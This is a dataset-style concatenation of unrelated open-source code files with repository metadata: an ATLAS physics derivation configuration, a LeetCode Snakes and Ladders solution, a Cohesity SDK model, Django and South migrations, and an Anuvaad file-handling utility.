# truth thinning: only applied on MC (see the `if isMC:` guards below).
from DerivationFrameworkMCTruth.DerivationFrameworkMCTruthConf import DerivationFramework__MenuTruthThinning
EXOT9TruthTool = DerivationFramework__MenuTruthThinning(name = "EXOT9TruthTool",
                                                        ThinningService = "EXOT9ThinningSvc",
                                                        WritePartons = False,
                                                        WriteHadrons = False,
                                                        WriteBHadrons = False,
                                                        WriteGeant = False,
                                                        GeantPhotonPtThresh = -1.0,
                                                        WriteTauHad = False,
                                                        PartonPtThresh = -1.0,
                                                        WriteBSM = True,
                                                        WriteBosons = True,
                                                        WriteBSMProducts = True,
                                                        WriteBosonProducts = True,
                                                        WriteTopAndDecays = True,
                                                        WriteTauHad = False,
                                                        WriteEverything = False,
                                                        WriteAllLeptons = False,
                                                        WriteStatus3 = False,
                                                        PreserveGeneratorDescendants = False,
                                                        PreserveAncestors = True,
                                                        WriteFirstN = -1)
if isMC:
    ToolSvc += EXOT9TruthTool
    thinningTools.append(EXOT9TruthTool)

# Additionally keep generator-level charged leptons and neutrinos
# (|pdgId| 11-16) above 1 GeV with the listed status codes.
truth_cond_Lepton = "((abs(TruthParticles.pdgId) >= 11) && (abs(TruthParticles.pdgId) <= 16) && (TruthParticles.pt > 1*GeV) && ((TruthParticles.status ==1) || (TruthParticles.status ==2) || (TruthParticles.status ==3) || (TruthParticles.status ==23)) && (TruthParticles.barcode<200000))"
from DerivationFrameworkMCTruth.DerivationFrameworkMCTruthConf import DerivationFramework__GenericTruthThinning
EXOT9TruthTool2 = DerivationFramework__GenericTruthThinning(name = "EXOT9TruthTool2",
                                                            ThinningService = "EXOT9ThinningSvc",
                                                            ParticleSelectionString = truth_cond_Lepton,
                                                            PreserveDescendants = False,
                                                            PreserveGeneratorDescendants = True,
                                                            PreserveAncestors = True)
if isMC:
    ToolSvc += EXOT9TruthTool2
    thinningTools.append(EXOT9TruthTool2)
#=======================================
# CREATE THE SKIMMING TOOL
#=======================================
# Event selection depends on the recorded beam energy: Run-1 (8 TeV) uses a
# trigger-based selection, Run-2 (13 TeV) an offline single-lepton selection.
beamEnergy = jobproperties.Beam.energy()
expression = ''
# NOTE(review): `expression` is never used below, and when beamEnergy falls
# between 4.1e6 and 6.0e6 neither branch sets `triggerStrategy`, so the tool
# construction would raise a NameError -- confirm the intended beam energies.
if (beamEnergy < 4.1e+06):
    triggerStrategy = '(EventInfo.eventTypeBitmask==1) || (EF_xe80_tclcw || EF_xe80_tclcw_loose || EF_e24vhi_medium1 || EF_e60_medium1 || EF_mu24i_tight || EF_mu36_tight || EF_g120_loose)'
if (beamEnergy > 6.0e+06):
    #triggerStrategy = '(EventInfo.eventTypeBitmask==1) || (HLT_mu26_imedium || HLT_mu50 || HLT_mu60_msonly_0eta105 || HLT_e28_tight_iloose || HLT_e60_medium || HLT_g140_loose || HLT_xe100 || HLT_g60_loose_xe60 || HLT_e140_loose)'
    triggerStrategy = '(count(Electrons.pt > 50*GeV && (Electrons.DFCommonElectronsLHLoose||Electrons.DFCommonElectronsLHMedium||Electrons.DFCommonElectronsLHTight||Electrons.DFCommonElectronsIsEMLoose||Electrons.DFCommonElectronsIsEMMedium||Electrons.DFCommonElectronsIsEMTight)) >= 1) || (count(Muons.pt > 50*GeV && (Muons.DFCommonGoodMuon && Muons.muonType == 0)) >= 1)'

from DerivationFrameworkTools.DerivationFrameworkToolsConf import DerivationFramework__xAODStringSkimmingTool
EXOT9SkimmingTool = DerivationFramework__xAODStringSkimmingTool( name = "EXOT9SkimmingTool1",
                                                                 expression = triggerStrategy)
ToolSvc += EXOT9SkimmingTool
print EXOT9SkimmingTool

#=======================================
# CREATE THE DERIVATION KERNEL ALGORITHM
#=======================================
# Skimming runs first so thinning only processes selected events.
from DerivationFrameworkCore.DerivationFrameworkCoreConf import DerivationFramework__DerivationKernel
DerivationFrameworkJob += exot9Seq
exot9Seq += CfgMgr.DerivationFramework__DerivationKernel("EXOT9Kernel_skim", SkimmingTools = [EXOT9SkimmingTool])
exot9Seq += CfgMgr.DerivationFramework__DerivationKernel("EXOT9Kernel", ThinningTools = thinningTools)

#====================================================================
# SET UP STREAM
#====================================================================
streamName = derivationFlags.WriteDAOD_EXOT9Stream.StreamName
fileName = buildFileName( derivationFlags.WriteDAOD_EXOT9Stream )
EXOT9Stream = MSMgr.NewPoolRootStream( streamName, fileName )
EXOT9Stream.AcceptAlgs(["EXOT9Kernel"])

# Thinning
from AthenaServices.Configurables import ThinningSvc, createThinningSvc
augStream = MSMgr.GetStream( streamName )
evtStream = augStream.GetEventStream()
svcMgr += createThinningSvc( svcName="EXOT9ThinningSvc", outStreams=[evtStream] )

#====================================================================
# Add the containers to the output stream - slimming done here
#====================================================================
from DerivationFrameworkCore.SlimmingHelper import SlimmingHelper
from DerivationFrameworkExotics.EXOT9ContentList import *
EXOT9SlimmingHelper = SlimmingHelper("EXOT9SlimmingHelper")
EXOT9SlimmingHelper.StaticContent = EXOT9Content
EXOT9SlimmingHelper.AllVariables = EXOT9AllVariables
EXOT9SlimmingHelper.SmartCollections = EXOT9SmartCollections
EXOT9SlimmingHelper.IncludeEGammaTriggerContent = True
EXOT9SlimmingHelper.IncludeMuonTriggerContent = True
EXOT9SlimmingHelper.AppendContentToStream(EXOT9Stream)
| [
"rushioda@lxplus754.cern.ch"
] | rushioda@lxplus754.cern.ch |
49ac9d28cdc33d372bad35111a0dada73d3cf5c4 | c4e3a57511eb7a39425847bdcd38a2207e560a13 | /Algorithm/909_Snakes_Or_Ladders.py | 4a704f1a03ea4df560bf51751413b205e395c053 | [] | no_license | Gi1ia/TechNoteBook | 57af562b78278b7f937b906d1154b19f2c077ebd | 1a3c1f4d6e9d3444039f087763b93241f4ba7892 | refs/heads/master | 2021-06-03T02:31:24.986063 | 2020-07-16T22:25:56 | 2020-07-16T22:25:56 | 141,761,958 | 7 | 1 | null | 2018-11-05T01:09:46 | 2018-07-20T22:06:12 | HTML | UTF-8 | Python | false | false | 1,299 | py | import collections
class Solution:
    def snakesAndLadders(self, board):
        """
        LeetCode 909: fewest dice rolls to reach square n*n on a
        boustrophedon-numbered board, following every snake/ladder landed on.

        Fixes/cleanup vs. the previous version: the unused ``index`` list is
        removed and the die-roll range is clipped up front instead of with a
        per-iteration ``continue``.

        :type board: List[List[int]]
        :rtype: int  (-1 when the last square is unreachable)
        """
        if not board or not board[0] or len(board[0]) == 1:
            return 0
        n = len(board)
        # Flatten the board into 1-based square order: bottom row
        # left-to-right, then alternating direction on the way up.
        straight = []
        left_to_right = True
        for i in reversed(range(n)):
            row = board[i] if left_to_right else list(reversed(board[i]))
            straight.extend(row)
            left_to_right = not left_to_right
        # BFS over squares; `seen` maps square -> fewest rolls to reach it.
        seen = {1: 0}
        queue = collections.deque([1])
        while queue:
            cur = queue.popleft()
            if cur == n * n:
                return seen[cur]
            for nxt in range(cur + 1, min(cur + 6, n * n) + 1):
                # Follow a snake or ladder if one starts on this square.
                if straight[nxt - 1] != -1:
                    nxt = straight[nxt - 1]
                if nxt not in seen:
                    seen[nxt] = seen[cur] + 1
                    queue.append(nxt)
        return -1
| [
"41492334+Gi1ia@users.noreply.github.com"
] | 41492334+Gi1ia@users.noreply.github.com |
ffb6607401c22caf600ff9a032495a22b1808ea7 | 665455c521cc7cf76c5436337ed545de90976af4 | /cohesity_management_sdk/models/mongoDB_additional_params.py | 7224cbcb0a345aae191387f6feddcbb4add9c4ad | [
"Apache-2.0"
] | permissive | hsantoyo2/management-sdk-python | d226273bc8eedcf9220ea4999a6f0b9a1a30d99c | 0093194d125fc6746f55b8499da1270c64f473fc | refs/heads/master | 2023-03-01T06:09:39.644085 | 2021-01-15T08:23:16 | 2021-01-15T08:23:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,906 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Cohesity Inc.
class MongoDBAdditionalParams(object):
    """Extra parameters required to back up a MongoDB cluster.

    Attributes:
        secondary_node_tag (list of string): tags of the secondary nodes
            that backups should be taken from.
        use_secondary_for_backup (bool): whether this cluster uses secondary
            nodes for backup.
    """

    # Model attribute name -> wire (API) property name.
    _names = {
        "secondary_node_tag": 'secondaryNodeTag',
        "use_secondary_for_backup": 'useSecondaryForBackup'
    }

    def __init__(self, secondary_node_tag=None, use_secondary_for_backup=None):
        """Store the supplied values on the instance."""
        self.secondary_node_tag = secondary_node_tag
        self.use_secondary_for_backup = use_secondary_for_backup

    @classmethod
    def from_dictionary(cls, dictionary):
        """Build an instance from a deserialized API response dict.

        Returns None when *dictionary* is None; missing keys default to None.
        """
        if dictionary is None:
            return None
        return cls(dictionary.get('secondaryNodeTag'),
                   dictionary.get('useSecondaryForBackup'))
"naveena.maplelabs@cohesity.com"
] | naveena.maplelabs@cohesity.com |
d8135d350a5efd8400b5d8049c2655c6b35e83eb | 522d50be4c7c4f289706eaf9b07e6a17b0d46199 | /src/djangopycsw/migrations/0011_auto_20150710_1157.py | d2bdf148b01958799a29b410b0777b4899bf8c14 | [] | no_license | ricardogsilva/django-pycsw | f7f4655ccc1d686074c4a0cded198290767fd788 | 0b51dcf0456e7d9f366874ac3f066e295f533876 | refs/heads/master | 2021-01-18T14:19:16.313364 | 2017-11-08T22:50:41 | 2017-11-08T22:50:41 | 38,635,333 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,568 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Auto-generated schema migration: caps several free-text fields at
    # max_length=100 and marks them blank-able across the collaborator,
    # organization, pycswconfig and record models.

    dependencies = [
        ('djangopycsw', '0010_auto_20150710_1155'),
    ]

    operations = [
        migrations.AlterField(
            model_name='collaborator',
            name='fax',
            field=models.CharField(max_length=100, blank=True),
        ),
        migrations.AlterField(
            model_name='collaborator',
            name='phone',
            field=models.CharField(max_length=100, blank=True),
        ),
        migrations.AlterField(
            model_name='organization',
            name='city',
            field=models.CharField(max_length=100, blank=True),
        ),
        migrations.AlterField(
            model_name='organization',
            name='country',
            field=models.CharField(max_length=100, blank=True),
        ),
        migrations.AlterField(
            model_name='organization',
            name='postal_code',
            field=models.CharField(max_length=100, blank=True),
        ),
        migrations.AlterField(
            model_name='organization',
            name='state_or_province',
            field=models.CharField(max_length=100, blank=True),
        ),
        migrations.AlterField(
            model_name='pycswconfig',
            name='inspire_default_language',
            field=models.CharField(max_length=100, blank=True),
        ),
        # The record fields below keep their pycsw-mapping help texts.
        migrations.AlterField(
            model_name='record',
            name='coupling_type',
            field=models.CharField(help_text=b'Maps to pycsw:CouplingType', max_length=100, null=True, blank=True),
        ),
        migrations.AlterField(
            model_name='record',
            name='distance_uom',
            field=models.CharField(help_text=b'Maps to pycsw:DistanceUOM', max_length=100, null=True, blank=True),
        ),
        migrations.AlterField(
            model_name='record',
            name='distance_value',
            field=models.CharField(help_text=b'Maps to pycsw:DistanceValue', max_length=100, null=True, blank=True),
        ),
        migrations.AlterField(
            model_name='record',
            name='geographic_description_code',
            field=models.CharField(help_text=b'Maps to pycsw:GeographicDescriptionCode', max_length=100, null=True, blank=True),
        ),
        migrations.AlterField(
            model_name='record',
            name='operation',
            field=models.CharField(help_text=b'Maps to pycsw:Operation', max_length=100, null=True, blank=True),
        ),
        migrations.AlterField(
            model_name='record',
            name='resource_language',
            field=models.CharField(help_text=b'Maps to pycsw:ResourceLanguage', max_length=100, null=True, blank=True),
        ),
        migrations.AlterField(
            model_name='record',
            name='service_type',
            field=models.CharField(help_text=b'Maps to pycsw:ServiceType', max_length=100, null=True, blank=True),
        ),
        migrations.AlterField(
            model_name='record',
            name='service_type_version',
            field=models.CharField(help_text=b'Maps to pycsw:ServiceTypeVersion', max_length=100, null=True, blank=True),
        ),
        migrations.AlterField(
            model_name='record',
            name='specification_date_type',
            field=models.CharField(help_text=b'Maps to pycsw:SpecificationDateType', max_length=100, null=True, blank=True),
        ),
    ]
"ricardo.garcia.silva@gmail.com"
] | ricardo.garcia.silva@gmail.com |
cd1f3ab6eb02464ada9c3e0bdbb15065d1bff148 | b2755ce7a643ae5c55c4b0c8689d09ad51819e6b | /anuvaad-etl/anuvaad-extractor/document-processor/ocr/google/src/utilities/utils.py | e05f8b91eff7a7fc61d6bf08994e9e6865583968 | [
"MIT"
] | permissive | project-anuvaad/anuvaad | 96df31170b27467d296cee43440b6dade7b1247c | 2bfcf6b9779bf1abd41e1bc42c27007127ddbefb | refs/heads/master | 2023-08-17T01:18:25.587918 | 2023-08-14T09:53:16 | 2023-08-14T09:53:16 | 265,545,286 | 41 | 39 | MIT | 2023-09-14T05:58:27 | 2020-05-20T11:34:37 | Jupyter Notebook | UTF-8 | Python | false | false | 3,688 | py | import os
from pathlib import Path
import time
import json
from anuvaad_auditor.errorhandler import post_error
from anuvaad_auditor.errorhandler import post_error_wf
class FileOperation(object):
    """Helper for file-path handling, JSON I/O and error reporting used by
    the document-processor workflow."""

    def __init__(self):
        # Relative folder where output files are written; set by
        # create_file_download_dir().
        self.download_folder = None

    # creating directory if it is not existed before.
    def create_file_download_dir(self, downloading_folder):
        """Create (if needed) and return the absolute download directory."""
        self.download_folder = downloading_folder
        download_dir = Path(os.path.join(os.getcwd(), self.download_folder))
        if download_dir.exists() is False:
            os.makedirs(download_dir)
        return str(download_dir)

    def accessing_files(self,files):
        """Extract (filepath, type, identifier) from one input-file dict.

        NOTE(review): `log_exception` and `LOG_WITHOUT_CONTEXT` are not in
        this module's visible imports, and when a key is missing the return
        statement reads unbound locals (UnboundLocalError) -- confirm.
        """
        try:
            filepath = files['name']
            file_type = files['type']
            identifier = files['identifier']
        except Exception as e:
            log_exception("accessing_files, keys not found ", LOG_WITHOUT_CONTEXT, e)
        return filepath, file_type, identifier

    # generating input filepath for input filename
    def input_path(self, input_filename):
        """Return the path of *input_filename* inside the 'upload' folder."""
        input_filepath = os.path.join('upload', input_filename)
        return input_filepath

    # extracting data from received json input
    def json_input_format(self, json_data):
        """Unpack the workflow request JSON into its individual fields.

        NOTE(review): same unbound-local risk as accessing_files() when a
        key is missing -- confirm.
        """
        try:
            input_data = json_data['input']['inputs']
            workflow_id = json_data['workflowCode']
            jobid = json_data['jobID']
            tool_name = json_data['tool']
            step_order = json_data['stepOrder']
        except Exception as e:
            log_exception("json_input_format, keys not found or mismatch in json inputs ", LOG_WITHOUT_CONTEXT, e)
        return input_data, workflow_id, jobid, tool_name, step_order

    # output format for individual pdf file
    def one_filename_response(self,output_json_file):
        """Wrap one output JSON filename in the response-file structure."""
        file_res = {
            "outputFile" : output_json_file,
            "outputType" : "json"
        }
        return file_res

    # checking file extension of received file type
    def check_file_extension(self, file_type):
        """Return True when *file_type* is a supported extension (pdf only)."""
        allowed_extensions = ['pdf']
        if file_type in allowed_extensions:
            return True
        else:
            return False

    # checking directory exists or not
    def check_path_exists(self, dir):
        """Return True when *dir* is non-None and exists on disk."""
        if dir is not None and os.path.exists(dir) is True:
            return True
        else:
            return False

    # generating output filepath for output filename
    def output_path(self,index, DOWNLOAD_FOLDER):
        """Build a unique '<index>-<timestamp>.json' path in DOWNLOAD_FOLDER."""
        output_filename = '%d-'%index + str(time.time()).replace('.', '') + '.json'
        output_filepath = os.path.join(DOWNLOAD_FOLDER, output_filename)
        return output_filepath , output_filename

    # writing json file of service response
    def writing_json_file(self, index, json_data, DOWNLOAD_FOLDER):
        """Serialize *json_data* to a new file and return its filename."""
        output_filepath , output_filename = self.output_path(index, DOWNLOAD_FOLDER)
        with open(output_filepath, 'w') as f:
            json_object = json.dumps(json_data)
            f.write(json_object)
        return output_filename

    # error manager integration
    def error_handler(self, object_in, code, iswf):
        """Report an error via the anuvaad auditor.

        *iswf* selects the workflow-scoped reporter (post_error_wf) over the
        plain one (post_error).
        NOTE(review): job_id/task_id/state/status are read but never used,
        and `code = code` is a no-op in the workflow branch -- confirm.
        """
        if iswf:
            job_id = object_in["jobID"]
            task_id = object_in["taskID"]
            state = object_in['state']
            status = object_in['status']
            code = code
            message = object_in['message']
            error = post_error_wf(code, message, object_in , None)
            return error
        else:
            code = object_in['error']['code']
            message = object_in['error']['message']
            error = post_error(code, message, None)
            return error
| [
"srihari.nagaraj@tarento.com"
] | srihari.nagaraj@tarento.com |
3c258612b6a06b131dd33dde99f1d222ad80f67e | 685f4474699d769dae88537c69f5517ac13a8431 | /EL37.py | 5132902ccc1db99462685de28e9318eee8d0eb4f | [] | no_license | Pumafied/Project-Euler | 7466f48e449b7314598c106398c0be0424ae72d5 | 0c3e80a956893ce1881a9694131d52b156b9d3d8 | refs/heads/master | 2016-09-05T22:45:09.733696 | 2013-04-20T04:46:48 | 2013-04-20T04:46:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 432 | py | # The number 3797 has an interesting property. Being prime itself, it is possible to continuously remove digits from left to right, and remain prime at each stage: 3797, 797, 97, and 7. Similarly we can work from right to left: 3797, 379, 37, and 3.
# Find the sum of the only eleven primes that are both truncatable from left to right and right to left.
# NOTE: 2, 3, 5, and 7 are not considered to be truncatable primes.
| [
"pumafied@gmail.com"
] | pumafied@gmail.com |
668e6428fdcf2c5b6ad771bafa1d1cda5a55e4db | f1a3bd9ad5ef76204c24dc96f113c405ece21b6d | /main/migrations/0043_auto.py | 0eb16b471a3427ab67c0d985d939e3271b099e46 | [] | no_license | JamesLinus/solidcomposer | 02f83c3731774e8008d46b418f3bf4fb5d9dab36 | ed75e576ce1c50487403437b5b537f9bfbb6397e | refs/heads/master | 2020-12-28T23:50:06.745329 | 2014-01-24T02:34:41 | 2014-01-24T02:34:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,399 | py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Removing M2M table for field new_competitions_bookmarked on 'Profile'
db.delete_table('main_profile_new_competitions_bookmarked')
def backwards(self, orm):
# Adding M2M table for field new_competitions_bookmarked on 'Profile'
db.create_table('main_profile_new_competitions_bookmarked', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('profile', models.ForeignKey(orm['main.profile'], null=False)),
('competition', models.ForeignKey(orm['competitions.competition'], null=False))
))
db.create_unique('main_profile_new_competitions_bookmarked', ['profile_id', 'competition_id'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'chat.chatroom': {
'Meta': {'object_name': 'ChatRoom'},
'blacklist': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'blacklisted_users'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['auth.User']"}),
'end_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'permission_type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'start_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'whitelist': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'whitelisted_users'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['auth.User']"})
},
'competitions.competition': {
'Meta': {'object_name': 'Competition'},
'chat_room': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'competition_chat_room2'", 'null': 'True', 'to': "orm['chat.ChatRoom']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {}),
'have_listening_party': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'host': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'competition_host2'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'listening_party_end_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'listening_party_start_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'preview_rules': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'preview_theme': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'rules': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'start_date': ('django.db.models.fields.DateTimeField', [], {}),
'submit_deadline': ('django.db.models.fields.DateTimeField', [], {}),
'theme': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'vote_deadline': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'vote_period_length': ('django.db.models.fields.IntegerField', [], {})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'main.accountplan': {
'Meta': {'object_name': 'AccountPlan'},
'customer_id': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'total_space': ('django.db.models.fields.IntegerField', [], {}),
'usd_per_month': ('django.db.models.fields.FloatField', [], {})
},
'main.band': {
'Meta': {'object_name': 'Band'},
'bio': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'concurrent_editing': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'folder': ('django.db.models.fields.CharField', [], {'max_length': '110', 'unique': 'True', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'openness': ('django.db.models.fields.IntegerField', [], {'default': '4'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '110', 'unique': 'True', 'null': 'True'})
},
'main.bandmember': {
'Meta': {'object_name': 'BandMember'},
'band': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Band']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'role': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'main.competition': {
'Meta': {'object_name': 'Competition'},
'chat_room': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['chat.ChatRoom']", 'null': 'True', 'blank': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {}),
'have_listening_party': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'host': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'listening_party_end_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'listening_party_start_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'preview_rules': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'preview_theme': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'rules': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'start_date': ('django.db.models.fields.DateTimeField', [], {}),
'submit_deadline': ('django.db.models.fields.DateTimeField', [], {}),
'theme': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'vote_deadline': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'vote_period_length': ('django.db.models.fields.IntegerField', [], {})
},
'main.entry': {
'Meta': {'object_name': 'Entry'},
'competition': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Competition']"}),
'edit_date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'song': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Song']"}),
'submit_date': ('django.db.models.fields.DateTimeField', [], {})
},
'main.profile': {
'Meta': {'object_name': 'Profile'},
'activate_code': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'activated': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'bio': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'competitions_bookmarked': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'competitions_bookmarked'", 'blank': 'True', 'to': "orm['competitions.Competition']"}),
'date_activity': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'plan': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.AccountPlan']", 'null': 'True'}),
'solo_band': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Band']"}),
'total_space': ('django.db.models.fields.IntegerField', [], {}),
'used_space': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'main.song': {
'Meta': {'object_name': 'Song'},
'band': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Band']"}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'length': ('django.db.models.fields.FloatField', [], {}),
'mp3_file': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'source_file': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'studio': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Studio']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'waveform_img': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'})
},
'main.songcomment': {
'Meta': {'object_name': 'SongComment'},
'content': ('django.db.models.fields.TextField', [], {}),
'date_created': ('django.db.models.fields.DateTimeField', [], {}),
'date_edited': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'main.songcommentthread': {
'Meta': {'object_name': 'SongCommentThread'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'position': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'song': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Song']"})
},
'main.studio': {
'Meta': {'object_name': 'Studio'},
'extension': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'logo_16x16': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'logo_large': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'main.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
'main.thumbsup': {
'Meta': {'object_name': 'ThumbsUp'},
'date_given': ('django.db.models.fields.DateTimeField', [], {}),
'entry': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Entry']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['main']
| [
"superjoe30@gmail.com"
